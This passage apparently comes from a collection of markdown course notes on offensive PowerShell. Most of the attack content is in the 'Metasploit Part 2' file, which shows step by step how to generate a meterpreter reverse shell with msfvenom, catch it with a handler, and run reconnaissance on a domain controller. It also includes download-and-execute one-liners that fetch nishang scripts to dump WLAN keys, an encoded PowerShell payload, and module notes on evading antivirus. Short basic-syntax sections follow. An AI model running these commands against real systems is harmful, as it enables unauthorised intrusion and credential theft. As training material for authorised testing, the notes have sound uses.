bytes\n\t\n\troot@kali:~#\n\t```\n\t\n\t```sh\n\troot@kali:~# file ps_payload.ps1\n\tps_payload.ps1: ASCII text, with very long lines, with no line terminators\n\troot@kali:~#\n\t```\n\t\n- Metasploit modules which use PowerShell\n\n - ```exploit/windows/smb/psexec_psh```\n - payload is never written to disk\n\n\t```sh\n\tmsf > use exploit/windows/smb/psexec_psh\n\t```\n\t \n\t```sh\n\tmsf exploit(psexec_psh) > show info\n\t\n\t Name: Microsoft Windows Authenticated Powershell Command Execution\n\t Module: exploit/windows/smb/psexec_psh\n\t Platform: Windows\n\t Privileged: Yes\n\t License: Metasploit Framework License (BSD)\n\t Rank: Manual\n\t Disclosed: 1999-01-01\n\t\n\tProvided by:\n\t Royce @R3dy__ Davis \n\t RageLtMan \n\t\n\tAvailable targets:\n\t Id Name\n\t -- ----\n\t 0 Automatic\n\t\n\tBasic options:\n\t Name Current Setting Required Description\n\t ---- --------------- -------- -----------\n\t DryRun false no Prints the powershell command that would be used\n\t RHOST yes The target address\n\t RPORT 445 yes The SMB service port (TCP)\n\t SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing\n\t SERVICE_DISPLAY_NAME no The service display name\n\t SERVICE_NAME no The service name\n\t SMBDomain . no The Windows domain to use for authentication\n\t SMBPass no The password for the specified username\n\t SMBUser no The username to authenticate as\n\t\n\tPayload information:\n\t Space: 3072\n\t\n\tDescription:\n\t This module uses a valid administrator username and password to\n\t execute a powershell payload using a similar technique to the\n\t \"psexec\" utility provided by SysInternals. The payload is encoded in\n\t base64 and executed from the commandline using the -encodedcommand\n\t flag. Using this method, the payload is never written to disk, and\n\t given that each payload is unique, is less prone to signature based\n\t detection. A persist option is provided to execute the payload in a\n\t while loop in order to maintain a form of persistence. In the event\n\t of a sandbox observing PSH execution, a delay and other obfuscation\n\t may be added to avoid detection. In order to avoid interactive\n\t process notifications for the current user, the psh payload has been\n\t reduced in size and wrapped in a powershell invocation which hides\n\t the window entirely.\n\t\n\tReferences:\n\t https://cvedetails.com/cve/CVE-1999-0504/\n\t OSVDB (3106)\n\t http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access\n\t http://sourceforge.net/projects/smbexec/\n\t http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx\n\t\n\tmsf exploit(psexec_psh) >\n\t```\n - ```exploit/windows/local/powershell_cmd_upgrade```\n - used to upgrade a ```native cmd``` to ```meterpreter```\n\n\t```sh\n\tmsf > use exploit/windows/local/powershell_cmd_upgrade\n\t```\n\t\n\t```sh\n\tmsf exploit(powershell_cmd_upgrade) > show info\n\t\n\t Name: Windows Command Shell Upgrade (Powershell)\n\t Module: exploit/windows/local/powershell_cmd_upgrade\n\t Platform: Windows\n\t Privileged: No\n\t License: Metasploit Framework License (BSD)\n\t Rank: Excellent\n\t Disclosed: 1999-01-01\n\t\n\tProvided by:\n\t Ben Campbell \n\t\n\tAvailable targets:\n\t Id Name\n\t -- ----\n\t 0 Universal\n\t\n\tBasic options:\n\t Name Current Setting Required Description\n\t ---- --------------- -------- -----------\n\t SESSION yes The session to run this module on.\n\t\n\tPayload information:\n\t\n\tDescription:\n\t This module executes Powershell to upgrade a Windows Shell session\n\t to a full Meterpreter session.\n\t\n\tmsf exploit(powershell_cmd_upgrade) >\n\t```" }, { "path": "53-Metasploit-Part-2.md", "content": "#### 53. Metasploit Part 2\n\n###### Manually executing scripts and modules\n\n- Upload a script\r- Use download and execute one liner\r- Use –EncodedCommand parameter of PowerShell\n\n- Generate ```Reverse Shell``` using ```msfvenom```\n\n```sh\nroot@kali:~# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.206 -f psh > ps_payload64.ps1\nNo platform was selected, choosing Msf::Module::Platform::Windows from the payload\nNo Arch selected, selecting Arch: x64 from the payload\nNo encoder or badchars specified, outputting raw payload\nPayload size: 743 bytes\nFinal size of psh file: 4380 bytes\nroot@kali:~#\n``` \n\n```sh\nroot@kali:~# file ps_payload64.ps1\nps_payload64.ps1: ASCII text, with very long lines, with CRLF line terminators \nroot@kali:~#\n```\n\n- Execute the ```Reverse Shell``` on victim\n\n```PowerShell\nPS C:\\Users\\Administrator\\Desktop> .\\ps_payload64.ps1\n2004\nPS C:\\Users\\Administrator\\Desktop>\n```\n\n- Setup ```multi handler```\n\n```sh\nroot@kali:~# msfconsole\nmsf > use exploit/multi/handler\nmsf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_https\nPAYLOAD => windows/x64/meterpreter/reverse_https\nmsf exploit(handler) > show options\n\nModule options (exploit/multi/handler):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n\n\nPayload options (windows/x64/meterpreter/reverse_https):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)\n LHOST yes The local listener hostname\n LPORT 8443 yes The local listener port\n LURI no The HTTP Path\n\n\nExploit target:\n\n Id Name\n -- ----\n 0 Wildcard Target\n\n\nmsf exploit(handler) > set LHOST 10.0.0.206\nLHOST => 10.0.0.206\nmsf exploit(handler) > exploit\n\n[*] Started HTTPS reverse handler on https://10.0.0.206:8443\n[*] Starting the payload handler...\n[*] https://10.0.0.206:8443 handling request from 10.0.0.233; (UUID: yc9exijd) Staging x64 payload (1190467 bytes) ...\n[*] Meterpreter session 1 opened (10.0.0.206:8443 -> 10.0.0.233:24056) at 2017-07-18 22:28:14 -0400\n\nmeterpreter > pwd\nC:\\Users\\Administrator\nmeterpreter >\n```\n\n- Upload a ```script```\n\t\n\t```sh\n\tmeterpreter > upload /root/Get-Information.ps1 C:\\\\Users\\\\Administrator\n\t[*] uploading : /root/Get-Information.ps1 -> C:\\Users\\Administrator\n\t[*] uploaded : /root/Get-Information.ps1 -> C:\\Users\\Administrator\\Get-Information.ps1\n\tmeterpreter > shell\n\tProcess 2664 created.\n\tChannel 2 created.\n\tMicrosoft Windows [Version 6.3.9600]\n\t(c) 2013 Microsoft Corporation. All rights reserved.\n\tC:\\Users\\Administrator>dir\n\tdir\n\t Volume in drive C has no label.\n\t Volume Serial Number is 00CC-8AA0\n\t\n\t Directory of C:\\Users\\Administrator\n\t\n\t07/18/2017 07:32 PM .\n\t07/18/2017 07:32 PM ..\n\t07/13/2017 12:59 PM Contacts\n\t07/18/2017 07:28 PM Desktop\n\t07/17/2017 11:37 AM Documents\n\t07/18/2017 05:24 PM Downloads\n\t07/13/2017 12:59 PM Favorites\n\t07/18/2017 07:32 PM 3,628 Get-Information.ps1\n\t07/13/2017 12:59 PM Links\n\t07/13/2017 12:59 PM Music\n\t07/13/2017 12:59 PM Pictures\n\t07/13/2017 12:59 PM Saved Games\n\t07/13/2017 12:59 PM Searches\n\t07/13/2017 12:59 PM Videos\n\t 1 File(s) 3,628 bytes\n\t 13 Dir(s) 8,540,938,240 bytes free\n\t\n\tC:\\Users\\Administrator>\n\t```\n\t\n\t```sh\n\tC:\\Users\\Administrator>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass . .\\Get-Information.ps1;Get-Information\n\t\n\tLogged in users:\n\tC:\\Windows\\system32\\config\\systemprofile\n\tC:\\Windows\\ServiceProfiles\\LocalService\n\tC:\\Windows\\ServiceProfiles\\NetworkService\n\tC:\\Users\\Administrator\n\tC:\\Users\\MSSQLSERVER\n\t\n\t Powershell environment:\n\tInstall\n\tPID\n\tConsoleHostShortcutTargetX86\n\tConsoleHostShortcutTarget\n\tInstall\n\t\n\t Putty trusted hosts:\n\t\n\t\n\t Putty saved sessions:\n\t\n\t\n\t Recently used commands:\n\tregedit\\1\n\ta\n\t\n\t Shares on the machine:\n\tCATimeout=0\n\tCSCFlags=4352\n\tMaxUses=4294967295\n\tPath=C:\\Windows\\SYSVOL\\sysvol\n\tPermissions=0\n\tRemark=Logon server share\n\tShareName=SYSVOL\n\tType=0\n\tCATimeout=0\n\tCSCFlags=4352\n\tMaxUses=4294967295\n\tPath=C:\\Windows\\SYSVOL\\sysvol\\pfpt.com\\SCRIPTS\n\tPermissions=0\n\tRemark=Logon server share\n\tShareName=NETLOGON\n\tType=0\n\t\n\t Environment variables:\n\tC:\\Windows\\system32\\cmd.exe\n\tNO\n\t1\n\tWindows_NT\n\tC:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Python27;C:\\Program Files\\Java\\jdk1.8.0_131\\bin\n\t.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC\n\tAMD64\n\tIntel64 Family 6 Model 78 Stepping 3, GenuineIntel\n\t6\n\t4e03\n\tC:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\\n\tC:\\Windows\\TEMP\n\tC:\\Windows\\TEMP\n\tSYSTEM\n\tC:\\Windows\n\t\n\t More details for current user:\n\t\\\\WIN-2012-DC\n\tPFPT.COM\n\tPFPT\n\tAdministrator\n\tC:\\Users\\Administrator\n\t\\Users\\Administrator\n\tC:\n\tC:\\Users\\Administrator\\AppData\\Roaming\n\tC:\\Users\\Administrator\\AppData\\Local\n\tPFPT\n\t\n\t SNMP community strings:\n\t\n\t\n\t SNMP community strings for current user:\n\t\n\t\n\t Installed Applications:\n\t\n\tMicrosoft Help Viewer 1.1\n\tMicrosoft Visual Studio 2010 Tools for Office Runtime (x64)\n\tMozilla Firefox 54.0.1 (x64 en-US)\n\tMozilla Maintenance Service\n\tOracle VM VirtualBox Guest Additions 5.1.22\n\t\n\tMicrosoft Visual C++ 2010 x64 Redistributable - 10.0.40219\n\tJava 8 Update 131 (64-bit)\n\tJava SE Development Kit 8 Update 131 (64-bit)\n\tVisual Studio 2010 Prerequisites - English\n\tMicrosoft Office Office 64-bit Components 2010\n\tMicrosoft Office Shared 64-bit MUI (English) 2010\n\tMicrosoft Office Shared 64-bit Setup Metadata MUI (English) 2010\n\tMicrosoft Visual Studio 2010 Tools for Office Runtime (x64)\n\tMicrosoft Help Viewer 1.1\n\t\n\t Installed Applications for current user:\n\t\n\t\n\t Domain Name:\n\t0\n\tpfpt.com\n\t4294967295\n\t\\\\WIN-2012-DC.pfpt.com\n\t\n\t0\n\t\n\t Contents of /etc/hosts:\n\t# Copyright (c) 1993-2009 Microsoft Corp.\n\t#\n\t# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\n\t#\n\t# This file contains the mappings of IP addresses to host names. Each\n\t# entry should be kept on an individual line. The IP address should\n\t# be placed in the first column followed by the corresponding host name.\n\t# The IP address and the host name should be separated by at least one\n\t# space.\n\t#\n\t# Additionally, comments (such as these) may be inserted on individual\n\t# lines or following the machine name denoted by a '#' symbol.\n\t#\n\t# For example:\n\t#\n\t# 102.54.94.97 rhino.acme.com # source server\n\t# 38.25.63.10 x.acme.com # x client host\n\t\n\t# localhost name resolution is handled within DNS itself.\n\t#\t127.0.0.1 localhost\n\t#\t::1 localhost\n\t\n\t Running Services:\n\tThese Windows services are started:\n\t\n\t Active Directory Domain Services\n\t Active Directory Web Services\n\t Background Intelligent Transfer Service\n\t Background Tasks Infrastructure Service\n\t Base Filtering Engine\n\t Certificate Propagation\n\t COM+ Event System\n\t Cryptographic Services\n\t DCOM Server Process Launcher\n\t DFS Namespace\n\t DFS Replication\n\t DHCP Client\n\t Diagnostic Policy Service\n\t Diagnostics Tracking Service\n\t Distributed Transaction Coordinator\n\t DNS Client\n\t DNS Server\n\t Group Policy Client\n\t IKE and AuthIP IPsec Keying Modules\n\t Intersite Messaging\n\t IP Helper\n\t IPsec Policy Agent\n\t Kerberos Key Distribution Center\n\t Local Session Manager\n\t Netlogon\n\t Network List Service\n\t Network Location Awareness\n\t Network Store Interface Service\n\t Plug and Play\n\t Power\n\t Print Spooler\n\t Remote Desktop Configuration\n\t Remote Desktop Services\n\t Remote Desktop Services UserMode Port Redirector\n\t Remote Procedure Call (RPC)\n\t RPC Endpoint Mapper\n\t Security Accounts Manager\n\t Server\n\t Shell Hardware Detection\n\t System Event Notification Service\n\t System Events Broker\n\t Task Scheduler\n\t TCP/IP NetBIOS Helper\n\t Themes\n\t User Access Logging Service\n\t User Profile Service\n\t Virtual Disk\n\t VirtualBox Guest Additions Service\n\t Windows Connection Manager\n\t Windows Event Log\n\t Windows Firewall\n\t Windows Font Cache Service\n\t Windows Licensing Monitoring Service\n\t Windows Management Instrumentation\n\t Windows Remote Management (WS-Management)\n\t Windows Time\n\t WinHTTP Web Proxy Auto-Discovery Service\n\t Workstation\n\t\n\tThe command completed successfully.\n\t\n\t\n\t Account Policy:\n\tForce user logoff how long after time expires?: Never\n\tMinimum password age (days): 1\n\tMaximum password age (days): 42\n\tMinimum password length: 7\n\tLength of password history maintained: 24\n\tLockout threshold: Never\n\tLockout duration (minutes): 30\n\tLockout observation window (minutes): 30\n\tComputer role: PRIMARY\n\tThe command completed successfully.\n\t\n\t\n\t Local users:\n\t\n\tUser accounts for \\\\WIN-2012-DC\n\t\n\t-------------------------------------------------------------------------------\n\tAdministrator Guest krbtgt\n\tThe command completed successfully.\n\t\n\t\n\t Local Groups:\n\t\n\tAliases for \\\\WIN-2012-DC\n\t\n\t-------------------------------------------------------------------------------\n\t*Access Control Assistance Operators\n\t*Account Operators\n\t*Administrators\n\t*Allowed RODC Password Replication Group\n\t*Backup Operators\n\t*Cert Publishers\n\t*Certificate Service DCOM Access\n\t*Cryptographic Operators\n\t*Denied RODC Password Replication Group\n\t*Distributed COM Users\n\t*DnsAdmins\n\t*Event Log Readers\n\t*Guests\n\t*HelpLibraryUpdaters\n\t*Hyper-V Administrators\n\t*IIS_IUSRS\n\t*Incoming Forest Trust Builders\n\t*Network Configuration Operators\n\t*Performance Log Users\n\t*Performance Monitor Users\n\t*Pre-Windows 2000 Compatible Access\n\t*Print Operators\n\t*RAS and IAS Servers\n\t*RDS Endpoint Servers\n\t*RDS Management Servers\n\t*RDS Remote Access Servers\n\t*Remote Desktop Users\n\t*Remote Management Users\n\t*Replicator\n\t*Server Operators\n\t*Terminal Server License Servers\n\t*Users\n\t*Windows Authorization Access Group\n\t*WinRMRemoteWMIUsers__\n\tThe command completed successfully.\n\t\n\t\n\t WLAN Info:\n\tThe following command was not found: wlan show all.\n\t\n\tC:\\Users\\Administrator>\n\t```\n\t\n- Use download and execute one liner\n\t\n\t```sh\n\tC:\\Users\\Administrator>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/powerpreter/Powerpreter.psm1'));Get-WLAN-Keys\n\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/powerpreter/Powerpreter.psm1'));Get-WLAN-Keys\n\t\n\tC:\\Users\\Administrator>\n\t```\n\t\n\t```sh\n\tC:\\Users\\Administrator>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/powerpreter/Powerpreter.psm1'));Check-VM\n\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/powerpreter/Powerpreter.psm1'));Check-VM\n\tThis is a Hyper-V machine.\n\tThis is a Virtual Box.\n\t\n\tC:\\Users\\Administrator>\n\t```\n\t\n- Use –EncodedCommand parameter of PowerShell\n\t\n\tIn Windows\n\t\t\n\tCall the function at the end of the script\n\t\n\t![Image of Call function](images/21.jpeg)\r\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> Import-Module .\\nishang.psm1\n\tWARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module\n\tcommand again with the Verbose parameter. For a list of approved verbs, type Get-Verb.\n\tWARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \\ $ ^ ; : \" ' < > | ? @ ` * % + = ~\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master> Invoke-Encode .\\Gather\\Get-WLAN-Keys.ps1 -OutCommand\n\tEncoded data written to .\\encoded.txt\n\tEncoded command written to .\\encodedcommand.txt\n\tPS C:\\Users\\Administrator\\Desktop\\nishang-master>\n\t```\n\t\n\tIn Metasploit shell\n\t\n\t```sh\n\tC:\\Users\\Administrator>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAZABaAEoAUgBhADkAcwB3AEUATQBmAGYAQgBmAG8ATwBoADUAdQBIAEIARwBhADcAZQB4AHEAVQBwAFoAQgAxADIAUQBqAE4ASABGAE4AbgBkAEcATwBNAG8AdABnAFgAUwA2AHMAcwBHAGUAbgBjAHQASABUADcANwBwAFAAdABVAEwAcQB0ADAANAB1AFEANwB2ADYALwAvADUAMQAwACsAOAA2AFUAcABLAHkAQgBqADAAagB4AHQAUgBZAG0AdgBzAFEASABEADUAdwA5AGMAdgBiADIAaABMAE8AawArAEoAcAB0ADgAbQBKAFYAYwBKAFkAcABMADQAVwBwAEkAUgBjAFAAMgBvAG8ASwBEAGwASwBWAEUAcQBxAHUAYQBUADMAYwA5AHEASwA5AGQAWABDADkAWABtAFQAUQBPAHIAdABYAEcAbgAzAEMAVwBTAEMAOABYAHgAWQBYAFYANgB0ADgAdQA5AHAAawBuAEcAMgBsADgAdABBAGUAQwBjACsAMAB5AGsAQwBwAFUAVABnAGcAdgBLAGUAQgA1AE0AVQBkAFYAdgAvAHcAdABoAEsAZgA1AEUAMwBuAEMAWABZAEkAcgBqAE8AdwBkADcAWQBCADQAVQBGAFUAagBUAEwASwBrAHgATQBVAEcARwBTAGgAUgBnAEkASwBvAHQANQBsAHIARwBmADUAWgBmAEUAcABYAHkAOAA1AHkAdwBzADQASAAvAHMATwBKAGsAUABmAFEAMwB5ADkAeQBpADQANQBrADAAVAB0AFcAWgBxADIAMQBzAHYAUwBWAHAAaABZAFYANgBlAHYAMwA1AHkAZQBqAGgARQBmAFEAcgBVAGkAMgBlADIAUwAwAGoAYQBwAEYAMAAwAHcARgBGADcAYQAyADkAUwBNAHoAOABUAFoAeQBYAG0AUAArADMAYgBSAFYAQgByAHAAbgBUAEsAVgBNAHYAVgAwADkAagAzADQAQwBpAGMAYQBtAE0ANwA2AE0ASQBRADEATwBZAFIAMwA5AHoAQQBIAGcAKwBRAGwAOQBDAGMASQBxAE0ATgBUADMALwBBAFQAQwB0AFIAWQBVAGwAeQBRAEMAeABTAEkAYwAwAEcARQB6AGsAQwAwADAAQgBvACsAZQAzAFMAUQBqADcAbABSAHkAUAAxAGcASABZAHAAUwB4AHAAdgBkAGoANgBDAEIAeAA4AGwATgBzAHIAVwBqAGMAagByADcAZABmAFQARQArADkAWQA2AHEAawBMAFYAdwBmAGgAWQB3AFkAdgBTAEsAMgB5ADEASwBIAEUAYQA5AGIASwAvADcAZgBvADcATwBJAFAAbwAxAGMAUgAwAFcAcgA4AEUASAA1AGoATAA1ADgAegAvAGQAbQBsAEUAZwAvAE4AbwBjAGgAUAAxAG4AegBVAGYAeABtAEUARQBjAGgAYgAyAFAAdwBhAFUAcwA5ADgAPQAnACkAKQApACkALAAgAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALAAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA\n\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAZABaAEoAUgBhADkAcwB3AEUATQBmAGYAQgBmAG8ATwBoADUAdQBIAEIARwBhADcAZQB4AHEAVQBwAFoAQgAxADIAUQBqAE4ASABGAE4AbgBkAEcATwBNAG8AdABnAFgAUwA2AHMAcwBHAGUAbgBjAHQASABUADcANwBwAFAAdABVAEwAcQB0ADAANAB1AFEANwB2ADYALwAvADUAMQAwACsAOAA2AFUAcABLAHkAQgBqADAAagB4AHQAUgBZAG0AdgBzAFEASABEADUAdwA5AGMAdgBiADIAaABMAE8AawArAEoAcAB0ADgAbQBKAFYAYwBKAFkAcABMADQAVwBwAEkAUgBjAFAAMgBvAG8ASwBEAGwASwBWAEUAcQBxAHUAYQBUADMAYwA5AHEASwA5AGQAWABDADkAWABtAFQAUQBPAHIAdABYAEcAbgAzAEMAVwBTAEMAOABYAHgAWQBYAFYANgB0ADgAdQA5AHAAawBuAEcAMgBsADgAdABBAGUAQwBjACsAMAB5AGsAQwBwAFUAVABnAGcAdgBLAGUAQgA1AE0AVQBkAFYAdgAvAHcAdABoAEsAZgA1AEUAMwBuAEMAWABZAEkAcgBqAE8AdwBkADcAWQBCADQAVQBGAFUAagBUAEwASwBrAHgATQBVAEcARwBTAGgAUgBnAEkASwBvAHQANQBsAHIARwBmADUAWgBmAEUAcABYAHkAOAA1AHkAdwBzADQASAAvAHMATwBKAGsAUABmAFEAMwB5ADkAeQBpADQANQBrADAAVAB0AFcAWgBxADIAMQBzAHYAUwBWAHAAaABZAFYANgBlAHYAMwA1AHkAZQBqAGgARQBmAFEAcgBVAGkAMgBlADIAUwAwAGoAYQBwAEYAMAAwAHcARgBGADcAYQAyADkAUwBNAHoAOABUAFoAeQBYAG0AUAArADMAYgBSAFYAQgByAHAAbgBUAEsAVgBNAHYAVgAwADkAagAzADQAQwBpAGMAYQBtAE0ANwA2AE0ASQBRADEATwBZAFIAMwA5AHoAQQBIAGcAKwBRAGwAOQBDAGMASQBxAE0ATgBUADMALwBBAFQAQwB0AFIAWQBVAGwAeQBRAEMAeABTAEkAYwAwAEcARQB6AGsAQwAwADAAQgBvACsAZQAzAFMAUQBqADcAbABSAHkAUAAxAGcASABZAHAAUwB4AHAAdgBkAGoANgBDAEIAeAA4AGwATgBzAHIAVwBqAGMAagByADcAZABmAFQARQArADkAWQA2AHEAawBMAFYAdwBmAGgAWQB3AFkAdgBTAEsAMgB5ADEASwBIAEUAYQA5AGIASwAvADcAZgBvADcATwBJAFAAbwAxAGMAUgAwAFcAcgA4AEUASAA1AGoATAA1ADgAegAvAGQAbQBsAEUAZwAvAE4AbwBjAGgAUAAxAG4AegBVAGYAeABtAEUARQBjAGgAYgAyAFAAdwBhAFUAcwA5ADgAPQAnACkAKQApACkALAAgAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALAAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA\n\t\n\tC:\\Users\\Administrator>\n\t```\n\n###### Using modules to execute PowerShell scripts\n\n- post/windows/manage/powershell/exec_powershell\n\n```sh\nmsf > use post/windows/manage/powershell/exec_powershell\n```\n\n```sh\nmsf post(exec_powershell) > show info\n\n Name: Windows Manage PowerShell Download and/or Execute\n Module: post/windows/manage/powershell/exec_powershell\n Platform: Windows\n Arch:\n Rank: Normal\n\nProvided by:\n Nicholas Nam (nick \n RageLtMan\n\nBasic options:\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n SCRIPT /usr/share/metasploit-framework/scripts/ps/msflag.ps1 yes Path to the local PS script\n SESSION yes The session to run this module on.\n\nDescription:\n This module will download and execute a PowerShell script over a\n meterpreter session. The user may also enter text substitutions to\n be made in memory before execution. Setting VERBOSE to true will\n output both the script prior to execution and the results.\n\nmsf post(exec_powershell) >\n```\n\r- exploit/multi/script/web_delivery\n\n```sh\nmsf > use exploit/multi/script/web_delivery\n```\n\n```sh\nmsf exploit(web_delivery) > show info\n\n Name: Script Web Delivery\n Module: exploit/multi/script/web_delivery\n Platform: Python, PHP, Windows\n Privileged: No\n License: Metasploit Framework License (BSD)\n Rank: Manual\n Disclosed: 2013-07-19\n\nProvided by:\n Andrew Smith \"jakx\" \n Ben Campbell \n Chris Campbell\n\nAvailable targets:\n Id Name\n -- ----\n 0 Python\n 1 PHP\n 2 PSH\n\nBasic options:\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0\n SRVPORT 8080 yes The local port to listen on.\n SSL false no Negotiate SSL for incoming connections\n SSLCert no Path to a custom SSL certificate (default is randomly generated)\n URIPATH no The URI to use for this exploit (default is random)\n\nPayload information:\n\nDescription:\n This module quickly fires up a web server that serves a payload. The\n provided command will start the specified scripting language\n interpreter and then download and execute the payload. The main\n purpose of this module is to quickly establish a session on a target\n machine when the attacker has to manually type in the command\n himself, e.g. Command Injection, RDP Session, Local Access or maybe\n Remote Command Exec. This attack vector does not write to disk so it\n is less likely to trigger AV solutions and will allow privilege\n escalations supplied by Meterpreter. When using either of the PSH\n targets, ensure the payload architecture matches the target computer\n or use SYSWOW64 powershell.exe to execute x86 payloads on x64\n machines.\n\nReferences:\n http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html\n http://www.pentestgeek.com/2013/07/19/invoke-shellcode/\n http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/\n http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html\n\nmsf exploit(web_delivery) >\n```" }, { "path": "6-Advanced-Operators.md", "content": "#### 6. Advanced Operators\n\n- Logical (```-and, -or, -xor, -not, !```)\n\n```PowerShell\nPS C:\\Users\\Windows-32> (1 -le 6) -and (6 -ge 6)\nTrue\nPS C:\\Users\\Windows-32> (1 -le 6) -and (6 -ge 8)\nFalse\nPS C:\\Users\\Windows-32>\n```\n\n```PowerShell\nPS C:\\Users\\Windows-32> (1 -le 6) -or (6 -ge 8)\nTrue\nPS C:\\Users\\Windows-32>\n```\n\n- Split and Join (```-split, -join```)\n\n```PowerShell\nPS C:\\Users\\Windows-32> \"Welcome to PowerShell\" -split \" \"\nWelcome\nto\nPowerShell\nPS C:\\Users\\Windows-32>\nPS C:\\Users\\Windows-32> \"Welcome to PowerShell\" -split \"t\"\nWelcome\no PowerShell\nPS C:\\Users\\Windows-32>\nPS C:\\Users\\Windows-32> \"Welcome to PowerShell\" -split \"t\",3\nWelcome\no PowerShell\nPS C:\\Users\\Windows-32>\n```\n\n```PowerShell\nPS C:\\Users\\Windows-32> \"Wel\",\" Please\" -join \"come\"\nWelcome Please\nPS C:\\Users\\Windows-32>\n```\n\n- Type Operators (```-is, -isnot, -as```)\n\n```PowerShell\nPS C:\\Users\\Windows-32> 3 -is \"int\"\nTrue\nPS C:\\Users\\Windows-32> \"3\" -is \"string\"\nTrue\nPS C:\\Users\\Windows-32>\n```\n\n```PowerShell\nPS C:\\Users\\Windows-32> 0x12 -as \"int\"\n18\nPS C:\\Users\\Windows-32> 0x12 -as \"string\"\n18\nPS C:\\Users\\Windows-32>\n```\n" }, { "path": "7-Types-in-Powershell.md", "content": "#### 7. Types in Powershell\n\n- ```Dynamic Types``` - Not strictly typed\n\n```PowerShell\nPS C:\\Users\\Windows-32> $value = \"string\" + 1\nPS C:\\Users\\Windows-32> $value.GetType()\n\nIsPublic IsSerial Name BaseType\n-------- -------- ---- --------\nTrue True String System.Object\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- Basis of ```PowerShell``` types is ```.Net```\n\n- [```Type Adaption```](https://blogs.msdn.microsoft.com/besidethepoint/2011/11/22/psobject-and-the-adapted-and-extended-type-systems-ats-and-ets/) – Provides access to alternate object systems like WMI, COM, ADSI etc.\n\n- ```Single quoted``` vs ```Double qouted```\n\n```PowerShell\nPS C:\\Users\\Windows-32> $str = \"This is a string\"\nPS C:\\Users\\Windows-32> $str.GetType()\n\nIsPublic 